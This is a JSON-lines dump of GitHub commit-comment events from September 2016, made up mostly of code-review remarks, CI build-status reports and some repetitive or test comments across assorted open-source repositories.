{"id":"4530139923","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Skoldsjo/Portfolio"},"payload":{"comment":{"id":18935320,"position":3,"line":3,"path":".gitignore","commit_id":"aad86b75924a0186f2fb4a679f1e7936acf159c9","created_at":"2016-09-07T20:42:44Z","updated_at":"2016-09-07T20:42:44Z","body":"Test"}},"created_at":"2016-09-07T20:42:44Z"}
{"id":"4530140483","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935321,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:42:50Z","updated_at":"2016-09-07T20:42:50Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T20:42:50Z"}
{"id":"4530140641","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935322,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:42:51Z","updated_at":"2016-09-07T20:42:51Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T20:42:51Z"}
{"id":"4530140769","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935323,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:42:52Z","updated_at":"2016-09-07T20:42:52Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T20:42:52Z"}
{"id":"4530140870","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935324,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:42:53Z","updated_at":"2016-09-07T20:42:53Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T20:42:53Z"}
{"id":"4530140974","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935325,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:42:54Z","updated_at":"2016-09-07T20:42:54Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T20:42:54Z"}
{"id":"4530141071","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935326,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:42:55Z","updated_at":"2016-09-07T20:42:55Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T20:42:55Z"}
{"id":"4530141214","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935327,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:42:57Z","updated_at":"2016-09-07T20:42:57Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T20:42:57Z"}
{"id":"4530142037","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935329,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:43:07Z","updated_at":"2016-09-07T20:43:07Z","body":"@JoinRajuncraftNow\r\nMaybe this will get his attention?"}},"created_at":"2016-09-07T20:43:07Z"}
{"id":"4530142245","type":"CommitCommentEvent","actor":{"login":"tsheaff"},"repo":{"name":"Alamofire/Alamofire"},"payload":{"comment":{"id":18935330,"position":null,"line":null,"path":null,"commit_id":"6775cb13f7329f1184e5737ca226958eaabce271","created_at":"2016-09-07T20:43:07Z","updated_at":"2016-09-07T20:43:07Z","body":"My app still sees about 4% of our users on iOS 8 @jshier "}},"created_at":"2016-09-07T20:43:07Z"}
{"id":"4530142414","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935332,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:43:11Z","updated_at":"2016-09-07T20:43:11Z","body":"@JoinRajuncraftNow\r\n\r\n"}},"created_at":"2016-09-07T20:43:11Z"}
{"id":"4530142526","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935333,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:43:12Z","updated_at":"2016-09-07T20:43:12Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T20:43:12Z"}
{"id":"4530142654","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935334,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:43:13Z","updated_at":"2016-09-07T20:43:13Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T20:43:13Z"}
{"id":"4530142723","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935335,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:43:15Z","updated_at":"2016-09-07T20:43:15Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T20:43:15Z"}
{"id":"4530142881","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935336,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:43:16Z","updated_at":"2016-09-07T20:43:16Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T20:43:16Z"}
{"id":"4530143031","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935337,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:43:17Z","updated_at":"2016-09-07T20:43:17Z","body":"@JoinRajuncraftNow"}},"created_at":"2016-09-07T20:43:17Z"}
{"id":"4530149535","type":"CommitCommentEvent","actor":{"login":"hseltman"},"repo":{"name":"hseltman/public"},"payload":{"comment":{"id":18935351,"position":null,"line":null,"path":null,"commit_id":"b73bf91971b8bcf464c58e44e275ebac2d96bef4","created_at":"2016-09-07T20:44:30Z","updated_at":"2016-09-07T20:44:30Z","body":"Defining character columns with apply(dtf, MARGIN=2, is.character) incorrectly calls numeric columns as character.  Changed to sapply()."}},"created_at":"2016-09-07T20:44:30Z"}
{"id":"4530152172","type":"CommitCommentEvent","actor":{"login":"zacharyacutey"},"repo":{"name":"JoinRajuncraftNow/Projects"},"payload":{"comment":{"id":18935357,"position":null,"line":null,"path":null,"commit_id":"eeadb30971d3f8c584b83d80b637a30f03979c0f","created_at":"2016-09-07T20:44:59Z","updated_at":"2016-09-07T20:44:59Z","body":"And... DOCUMENT.COOKIE CAN'T BE CLEARED IN FIREFOX!"}},"created_at":"2016-09-07T20:44:59Z"}
{"id":"4530155143","type":"CommitCommentEvent","actor":{"login":"jshier"},"repo":{"name":"Alamofire/Alamofire"},"payload":{"comment":{"id":18935362,"position":null,"line":null,"path":null,"commit_id":"6775cb13f7329f1184e5737ca226958eaabce271","created_at":"2016-09-07T20:45:30Z","updated_at":"2016-09-07T20:45:30Z","body":"You can find more information about the why in #1367. "}},"created_at":"2016-09-07T20:45:30Z"}
{"id":"4530158216","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Skoldsjo/Portfolio"},"payload":{"comment":{"id":18935375,"position":5,"line":5,"path":".gitignore","commit_id":"aad86b75924a0186f2fb4a679f1e7936acf159c9","created_at":"2016-09-07T20:46:05Z","updated_at":"2016-09-07T20:46:05Z","body":"Bajs"}},"created_at":"2016-09-07T20:46:05Z"}
{"id":"4530159026","type":"CommitCommentEvent","actor":{"login":"Gobberwart"},"repo":{"name":"sohje/PokemonGo-Bot"},"payload":{"comment":{"id":18935379,"position":21,"line":17,"path":"pokemongo_bot/cell_workers/update_live_stats.py","commit_id":"4ca79b24cb041fab9a4b4e72eb178354a8eebdea","created_at":"2016-09-07T20:46:14Z","updated_at":"2016-09-07T20:46:14Z","body":"This can go too. Now json isn't being used, this isn't necessary."}},"created_at":"2016-09-07T20:46:14Z"}
{"id":"4530159240","type":"CommitCommentEvent","actor":{"login":"ksjogo"},"repo":{"name":"ksjogo/platformsh-typo3-template"},"payload":{"comment":{"id":18935383,"position":null,"line":null,"path":null,"commit_id":"73d8bc16061edbf19fca2f6e7ed4a5d5b53d616c","created_at":"2016-09-07T20:46:16Z","updated_at":"2016-09-07T20:46:16Z","body":"Why revert? Seems reasonable to me. ;)"}},"created_at":"2016-09-07T20:46:16Z"}
{"id":"4530161744","type":"CommitCommentEvent","actor":{"login":"hvlad"},"repo":{"name":"FirebirdSQL/firebird"},"payload":{"comment":{"id":18935391,"position":15,"line":6845,"path":"src/dsql/parse.y","commit_id":"ebd0d3c8133c62b5359100de5f1eec541e43da3b","created_at":"2016-09-07T20:46:44Z","updated_at":"2016-09-07T20:46:44Z","body":"These two rules introduced a lot of reduce/reduce conflicts."}},"created_at":"2016-09-07T20:46:44Z"}
{"id":"4530164447","type":"CommitCommentEvent","actor":{"login":"adamschwartz"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18935399,"position":26,"line":27,"path":"app/components/target-wrapper/screenshot.styl","commit_id":"7908dca49dcaf826765f599f89260742fe4e544e","created_at":"2016-09-07T20:47:13Z","updated_at":"2016-09-07T20:47:13Z","body":"what is the purpose of this change?"}},"created_at":"2016-09-07T20:47:13Z"}
{"id":"4530165316","type":"CommitCommentEvent","actor":{"login":"codesnake"},"repo":{"name":"kszaq/LibreELEC.tv"},"payload":{"comment":{"id":18935402,"position":null,"line":null,"path":null,"commit_id":"51f50059fa69b9b9b7f36113c419df973a18be55","created_at":"2016-09-07T20:47:21Z","updated_at":"2016-09-07T20:47:21Z","body":"Unfortunately recently I found that while the above fix works well with 2D content, it screws up 3D content. So it still something to do..."}},"created_at":"2016-09-07T20:47:21Z"}
{"id":"4530167972","type":"CommitCommentEvent","actor":{"login":"davis"},"repo":{"name":"belackriv/plugin-hbs"},"payload":{"comment":{"id":18935408,"position":null,"line":null,"path":null,"commit_id":"5eaf20996055f908561d32dbc7e453d43573eaff","created_at":"2016-09-07T20:47:49Z","updated_at":"2016-09-07T20:47:49Z","body":"if you have a spare moment, could you try this branch:\r\nhttps://github.com/davis/plugin-hbs/tree/get-canonical-name\r\n\r\nand let me know if it fixes your issue? not sure it is the same scenario, but yeah it's using `System.useCanonicalName`"}},"created_at":"2016-09-07T20:47:49Z"}
{"id":"4530171120","type":"CommitCommentEvent","actor":{"login":"FavioVazquez"},"repo":{"name":"FavioVazquez/clase-git-github"},"payload":{"comment":{"id":18935418,"position":7,"line":4,"path":"prueba.txt","commit_id":"0fbcf43a12b21c949bd72c18dd5c692330f754ed","created_at":"2016-09-07T20:48:25Z","updated_at":"2016-09-07T20:48:25Z","body":"Oh funny"}},"created_at":"2016-09-07T20:48:25Z"}
{"id":"4530171217","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Skoldsjo/Portfolio"},"payload":{"comment":{"id":18935420,"position":3,"line":3,"path":".gitignore","commit_id":"aad86b75924a0186f2fb4a679f1e7936acf159c9","created_at":"2016-09-07T20:48:26Z","updated_at":"2016-09-07T20:48:26Z","body":"Hhhhh"}},"created_at":"2016-09-07T20:48:26Z"}
{"id":"4530171652","type":"CommitCommentEvent","actor":{"login":"ronen"},"repo":{"name":"SchemaPlus/schema_plus_compatibility"},"payload":{"comment":{"id":18935422,"position":4,"line":3,"path":"lib/schema_plus/compatibility/version.rb","commit_id":"dd1a2347144efc9fc50fd88a743494c9f6b86a59","created_at":"2016-09-07T20:48:31Z","updated_at":"2016-09-07T20:48:31Z","body":"Ignoring the leading-0 rule of semver (which I think should be ignored), very technically this is a breaking change so should be a major version bump.  But since it's pretty likely we're the only ones using this so far anyway, it's probably fine."}},"created_at":"2016-09-07T20:48:31Z"}
{"id":"4530173828","type":"CommitCommentEvent","actor":{"login":"TeffenEllis"},"repo":{"name":"EagerIO/EmbedBox"},"payload":{"comment":{"id":18935429,"position":26,"line":27,"path":"app/components/target-wrapper/screenshot.styl","commit_id":"7908dca49dcaf826765f599f89260742fe4e544e","created_at":"2016-09-07T20:48:55Z","updated_at":"2016-09-07T20:48:55Z","body":"Sorts the properties in alphabetical order. This is common through the repo and keeps merge conflicts at a minimum 😃 "}},"created_at":"2016-09-07T20:48:55Z"}
{"id":"4530175501","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":18935431,"position":null,"line":null,"path":null,"commit_id":"e3485a679046b9cea78ffef665c6ce051442d5a8","created_at":"2016-09-07T20:49:14Z","updated_at":"2016-09-07T20:49:14Z","body":"saw approval from nickelization\nat https://github.com/basho/riak_core/commit/e3485a679046b9cea78ffef665c6ce051442d5a8"}},"created_at":"2016-09-07T20:49:14Z"}
{"id":"4530175561","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":18935432,"position":null,"line":null,"path":null,"commit_id":"e3485a679046b9cea78ffef665c6ce051442d5a8","created_at":"2016-09-07T20:49:15Z","updated_at":"2016-09-07T20:49:15Z","body":"merging basho/riak_core/fd-eleveldb-dep = e3485a67 into borshop-integration-857-fd-eleveldb-dep"}},"created_at":"2016-09-07T20:49:15Z"}
{"id":"4530175593","type":"CommitCommentEvent","actor":{"login":"borshop"},"repo":{"name":"basho/riak_core"},"payload":{"comment":{"id":18935433,"position":null,"line":null,"path":null,"commit_id":"e3485a679046b9cea78ffef665c6ce051442d5a8","created_at":"2016-09-07T20:49:15Z","updated_at":"2016-09-07T20:49:15Z","body":"basho/riak_core/fd-eleveldb-dep = e3485a67 merged ok, testing candidate = db8c8122"}},"created_at":"2016-09-07T20:49:15Z"}
{"id":"4530177040","type":"CommitCommentEvent","actor":{"login":"gstew5"},"repo":{"name":"bagnalla/cagesim"},"payload":{"comment":{"id":18935435,"position":null,"line":null,"path":null,"commit_id":"601d3b791753cc0e59b2cb24e586e08a47105691","created_at":"2016-09-07T20:49:30Z","updated_at":"2016-09-07T20:49:30Z","body":"Hey Alex,\r\n\r\nIs this a visualization of MWU? If so, I may be able to show it at a talk (perhaps at the math club on Sept. 19) :-)\r\n\r\n- Gordon"}},"created_at":"2016-09-07T20:49:30Z"}
{"id":"4530177139","type":"CommitCommentEvent","actor":{"login":"jovil"},"repo":{"name":"Skoldsjo/Portfolio"},"payload":{"comment":{"id":18935436,"position":null,"line":null,"path":null,"commit_id":"aad86b75924a0186f2fb4a679f1e7936acf159c9","created_at":"2016-09-07T20:49:32Z","updated_at":"2016-09-07T20:49:32Z","body":"Hshehew"}},"created_at":"2016-09-07T20:49:32Z"}
{"id":"4530178457","type":"CommitCommentEvent","actor":{"login":"Thomas-Gelf"},"repo":{"name":"Icinga/icingaweb2-module-director"},"payload":{"comment":{"id":18935438,"position":25,"line":65,"path":"test/php/library/Director/IcingaConfig/IcingaConfigHelperTest.php","commit_id":"6427b226219a2d76e31087ad00cc6123979ffb6a","created_at":"2016-09-07T20:49:47Z","updated_at":"2016-09-07T20:49:47Z","body":"@GenevievePlantin: seems to be a PHP 5.x VS 7.x issue. Had impact on tests but not on whether Director works or not. Please find related comments in https://dev.icinga.org/issues/12591."}},"created_at":"2016-09-07T20:49:47Z"}
{"id":"4530181626","type":"CommitCommentEvent","actor":{"login":"sidorares"},"repo":{"name":"sidorares/node-mysql2"},"payload":{"comment":{"id":18935446,"position":null,"line":null,"path":null,"commit_id":"58d906854c8787de8bcbdf5c6774d31c058ff1d6","created_at":"2016-09-07T20:50:23Z","updated_at":"2016-09-07T20:50:23Z","body":"yes, typo\r\npreviously we assumed everything from/to server is utf8"}},"created_at":"2016-09-07T20:50:23Z"}
{"id":"4530187492","type":"CommitCommentEvent","actor":{"login":"guidoignacio"},"repo":{"name":"David256/ChatBotTelegram"},"payload":{"comment":{"id":18935463,"position":null,"line":null,"path":null,"commit_id":"5591d8c469d999e2c775c4108c55543a7ccb5f87","created_at":"2016-09-07T20:51:31Z","updated_at":"2016-09-07T20:51:31Z","body":"Gracias capo!!! Tenes user en Telegram? quiero hacerte unas consultas.\r\nPor ej. le modifico el limite con !limit 12000 pero no pasa de 6000. Veo el .cfg y tomó el cambio a 12000\r\n\r\n!limit\r\nThe max limit is 12000\r\n\r\n!words\r\nI know 6000 words (21056 contexts, 3.51 per word), 3746 lines."}},"created_at":"2016-09-07T20:51:31Z"}
{"id":"4530188210","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18935465,"position":null,"line":null,"path":null,"commit_id":"aaeb6a1593327a2b1968b149ed7758fc61fe3d55","created_at":"2016-09-07T20:51:39Z","updated_at":"2016-09-07T20:51:39Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1188 of 1188 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.99%25-green.svg)</a>\n"}},"created_at":"2016-09-07T20:51:39Z"}
{"id":"4530190051","type":"CommitCommentEvent","actor":{"login":"ZiFFeL1992"},"repo":{"name":"driftyco/ionic2-app-base"},"payload":{"comment":{"id":18935476,"position":16,"line":22,"path":"package.json","commit_id":"47923bc112d57af331ee0ad14c614133b19fb141","created_at":"2016-09-07T20:51:59Z","updated_at":"2016-09-07T20:51:59Z","body":"`ionicons` is also in `ionic-angular` dependices."}},"created_at":"2016-09-07T20:51:59Z"}
{"id":"4530193717","type":"CommitCommentEvent","actor":{"login":"mikeobrien"},"repo":{"name":"mikeobrien/Bender"},"payload":{"comment":{"id":18935484,"position":null,"line":null,"path":null,"commit_id":"3cb5f4c0d633b51e295f7b9907da0f2c350a80b8","created_at":"2016-09-07T20:52:41Z","updated_at":"2016-09-07T20:52:41Z","body":"TeamCity Bender :: Deploy [Build 3.0.56.0](http://build.mikeobrien.net/viewLog.html?buildId=2714&buildTypeId=bender&guest=1) outcome was **SUCCESS**\nSummary: Tests passed: 5097, ignored: 5 Build time: 00:00:55"}},"created_at":"2016-09-07T20:52:41Z"}
{"id":"4530195348","type":"CommitCommentEvent","actor":{"login":"bepcho"},"repo":{"name":"bepcho/HelloWorld"},"payload":{"comment":{"id":18935494,"position":null,"line":null,"path":null,"commit_id":"0e344b970330d0b16e6887d3c29f465db050cdd4","created_at":"2016-09-07T20:53:00Z","updated_at":"2016-09-07T20:53:00Z","body":"deleted"}},"created_at":"2016-09-07T20:53:00Z"}
{"id":"4530203835","type":"CommitCommentEvent","actor":{"login":"Gobberwart"},"repo":{"name":"sohje/PokemonGo-Bot"},"payload":{"comment":{"id":18935523,"position":252,"line":354,"path":"pokemongo_bot/cell_workers/update_live_stats.py","commit_id":"4ca79b24cb041fab9a4b4e72eb178354a8eebdea","created_at":"2016-09-07T20:54:33Z","updated_at":"2016-09-07T20:54:33Z","body":"Previously, some of these values came from player_stats, but most come from metrics.  Now everything just shows player_stats and I'm pretty sure it's not there. "}},"created_at":"2016-09-07T20:54:33Z"}
{"id":"4530204957","type":"CommitCommentEvent","actor":{"login":"dterweij"},"repo":{"name":"iTXTech/Genisys"},"payload":{"comment":{"id":18935527,"position":null,"line":null,"path":null,"commit_id":"8499afd68a7a5238c88afec06519cfc80013c850","created_at":"2016-09-07T20:54:44Z","updated_at":"2016-09-07T20:54:44Z","body":"I liked it. Better something that somekind of moved in the world then in a world with humans.\r\n\r\nSo you killed my usage of Genisys. I stop using new versions until this is back and again I go look for another clone to use. IM was the best then it went dead, Now  i am used to use Genisys but this is a game stopper for me and my 3 kids."}},"created_at":"2016-09-07T20:54:44Z"}
{"id":"4530210034","type":"CommitCommentEvent","actor":{"login":"hyperNURb"},"repo":{"name":"google/ggrc-core"},"payload":{"comment":{"id":18935534,"position":5,"line":30,"path":"src/ggrc/assets/javascripts/apps/custom_attributes.js","commit_id":"411f52c32f3cf098e35bf5aa2d684f8f6ff47604","created_at":"2016-09-07T20:55:42Z","updated_at":"2016-09-07T20:55:42Z","body":"I think this is another layer of complexity, isn't it easier to check if `val` has method `reify` and call it in that case? "}},"created_at":"2016-09-07T20:55:42Z"}
{"id":"4530212224","type":"CommitCommentEvent","actor":{"login":"claucece"},"repo":{"name":"twstrike/otrv4"},"payload":{"comment":{"id":18935538,"position":140,"line":128,"path":"otrv4.md","commit_id":"4c94da9242a80ca74c7cc5aec78a58bdd734682c","created_at":"2016-09-07T20:56:08Z","updated_at":"2016-09-07T20:56:08Z","body":"And this [link](https://github.com/cben/mathdown/wiki/math-in-markdown) is useful too. "}},"created_at":"2016-09-07T20:56:08Z"}
{"id":"4530216023","type":"CommitCommentEvent","actor":{"login":"Gobberwart"},"repo":{"name":"sohje/PokemonGo-Bot"},"payload":{"comment":{"id":18935554,"position":252,"line":354,"path":"pokemongo_bot/cell_workers/update_live_stats.py","commit_id":"4ca79b24cb041fab9a4b4e72eb178354a8eebdea","created_at":"2016-09-07T20:56:48Z","updated_at":"2016-09-07T20:56:48Z","body":"Ah, no I see what you've done. Maybe should name it something else (eg. stat_data) to avoid confusion between inventory.player_stats and this local variable."}},"created_at":"2016-09-07T20:56:48Z"}
{"id":"4530217665","type":"CommitCommentEvent","actor":{"login":"maxwell-oroark"},"repo":{"name":"alex3165/react-mapbox-gl"},"payload":{"comment":{"id":18935556,"position":null,"line":null,"path":null,"commit_id":"9e1660e40b25cafe9f6268e6f32cc947b511c58d","created_at":"2016-09-07T20:57:07Z","updated_at":"2016-09-07T20:57:07Z","body":"Awesome! thanks so much @philpl - random question, did you need a special webpack loader to import that geojson file?"}},"created_at":"2016-09-07T20:57:07Z"}
{"id":"4530220670","type":"CommitCommentEvent","actor":{"login":"vks"},"repo":{"name":"kbknapp/clap-rs"},"payload":{"comment":{"id":18935565,"position":8,"line":372,"path":"src/app/help.rs","commit_id":"c76785239fd42adc8ca04f9202b6fec615aa9f14","created_at":"2016-09-07T20:57:39Z","updated_at":"2016-09-07T20:57:39Z","body":"Why not just use `replace` unconditionally? It seems to me that a noop replace is more or less computationally as much work as a negative `contains` check."}},"created_at":"2016-09-07T20:57:39Z"}
{"id":"4530223976","type":"CommitCommentEvent","actor":{"login":"ppisonero"},"repo":{"name":"ppisonero/contribucion-a-ciegas"},"payload":{"comment":{"id":18935574,"position":null,"line":null,"path":null,"commit_id":"bcc400d1a33f21abe3b611a99d7c2458515bfb46","created_at":"2016-09-07T20:58:16Z","updated_at":"2016-09-07T20:58:16Z","body":"mi contribucion en el juego del tutorial..."}},"created_at":"2016-09-07T20:58:16Z"}
{"id":"4530227605","type":"CommitCommentEvent","actor":{"login":"sohje"},"repo":{"name":"sohje/PokemonGo-Bot"},"payload":{"comment":{"id":18935584,"position":21,"line":17,"path":"pokemongo_bot/cell_workers/update_live_stats.py","commit_id":"4ca79b24cb041fab9a4b4e72eb178354a8eebdea","created_at":"2016-09-07T20:58:55Z","updated_at":"2016-09-07T20:58:55Z","body":"json module still used for load data from \"data/xp_per_level.json\". Seems we may remove file from project file structure and remove that code."}},"created_at":"2016-09-07T20:58:55Z"}
{"id":"4530231590","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18935592,"position":null,"line":null,"path":null,"commit_id":"d6557e02f5c725e9fd2fcceb230f0bbc49fb26c8","created_at":"2016-09-07T20:59:37Z","updated_at":"2016-09-07T20:59:37Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;DmsEXHfv&#x2F;8-ft-007-show-current-playing-stream-name\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [FT-007] Show current playing stream name</a>"}},"created_at":"2016-09-07T20:59:37Z"}
{"id":"4530238910","type":"CommitCommentEvent","actor":{"login":"untergeek"},"repo":{"name":"chetandhembre/curator"},"payload":{"comment":{"id":18935609,"position":37,"line":743,"path":"curator/actions.py","commit_id":"63ca324e194b3ba5c84d36483d30e98b955c5699","created_at":"2016-09-07T21:00:51Z","updated_at":"2016-09-07T21:00:51Z","body":"There's a reason that I do not call with the snapshot in the main branch.  If you only check for the current snapshot, and there's another running which was started by some other API call, you will get a false negative.\r\n\r\nSince you've forked this and are trying to make it work with AWS, I thought you should at least know the reason why I didn't do what you did here 😄 \r\n\r\nIf AWS ES doesn't let you make that API call without a repository, well that's different."}},"created_at":"2016-09-07T21:00:51Z"}
{"id":"4530240665","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18935615,"position":null,"line":null,"path":null,"commit_id":"aaeb6a1593327a2b1968b149ed7758fc61fe3d55","created_at":"2016-09-07T21:01:09Z","updated_at":"2016-09-07T21:01:09Z","body":"<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-Linux-Ubuntu-14.04-gcc-4.8.html'>Unhandled Failure</a>\n"}},"created_at":"2016-09-07T21:01:09Z"}
{"id":"4530242025","type":"CommitCommentEvent","actor":{"login":"vks"},"repo":{"name":"kbknapp/clap-rs"},"payload":{"comment":{"id":18935633,"position":44,"line":933,"path":"src/app/help.rs","commit_id":"c76785239fd42adc8ca04f9202b6fec615aa9f14","created_at":"2016-09-07T21:01:22Z","updated_at":"2016-09-07T21:01:22Z","body":"Can this be removed? There is also some more code that is commented out."}},"created_at":"2016-09-07T21:01:22Z"}
{"id":"4530243734","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"phalcon/docs"},"payload":{"comment":{"id":18935635,"position":null,"line":null,"path":null,"commit_id":"c322fc50da79437036010bc9c4373d2faca0afa4","created_at":"2016-09-07T21:01:41Z","updated_at":"2016-09-07T21:01:41Z","body":"👍 "}},"created_at":"2016-09-07T21:01:41Z"}
{"id":"4530244533","type":"CommitCommentEvent","actor":{"login":"sergeyklay"},"repo":{"name":"phalcon/docs"},"payload":{"comment":{"id":18935638,"position":null,"line":null,"path":null,"commit_id":"5ff620f1b95b98d257862a94080028191aa43d57","created_at":"2016-09-07T21:01:49Z","updated_at":"2016-09-07T21:01:49Z","body":"👍 "}},"created_at":"2016-09-07T21:01:49Z"}
{"id":"4530245062","type":"CommitCommentEvent","actor":{"login":"aconanlai"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18935643,"position":null,"line":null,"path":null,"commit_id":"d6557e02f5c725e9fd2fcceb230f0bbc49fb26c8","created_at":"2016-09-07T21:01:55Z","updated_at":"2016-09-07T21:01:55Z","body":"fetching info from airtime API done in server.js now, to be moved to worker process"}},"created_at":"2016-09-07T21:01:55Z"}
{"id":"4530245470","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":18935644,"position":null,"line":null,"path":null,"commit_id":"aaeb6a1593327a2b1968b149ed7758fc61fe3d55","created_at":"2016-09-07T21:01:59Z","updated_at":"2016-09-07T21:01:59Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (RKStrand) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-aaeb6a1593327a2b1968b149ed7758fc61fe3d55-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-07T21:01:59Z"}
